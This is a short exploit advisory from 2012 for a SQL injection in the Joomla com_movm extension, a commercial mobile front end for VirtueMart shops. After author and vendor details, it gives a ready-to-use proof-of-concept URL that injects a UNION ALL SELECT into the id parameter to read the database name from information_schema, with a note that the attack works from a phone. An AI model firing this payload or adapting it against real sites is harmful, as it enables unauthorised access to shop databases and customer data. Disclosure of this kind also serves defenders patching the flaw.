_______________________________________________________________________________________ Exploit Title: Joomla com_movm SQL Injection Date: [31-07-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R site: http://poisonsecurity.wordpress.com/ Vendor: http://www.movm.net/ Version: 1.0 (Date Added 28 July 2012) License: Commercial $ 49.99 us Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/ Tested on: [Linux(bt5)-Windows(7ultimate)] This component was released 3 days ago.be careful when using this component Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry. It is compatible with Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App. This component can be Attacked from a mobile, put the following string in the url field. p0C http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20 Im not responsible for which is given No me hago responsable del uso que se le de _______________________________________________________________________________________ Daniel Barragan "D4NB4R" 2012Брой прочитания на тази страница: 1569
Joomla Movm Extension (com_movm) SQL Injection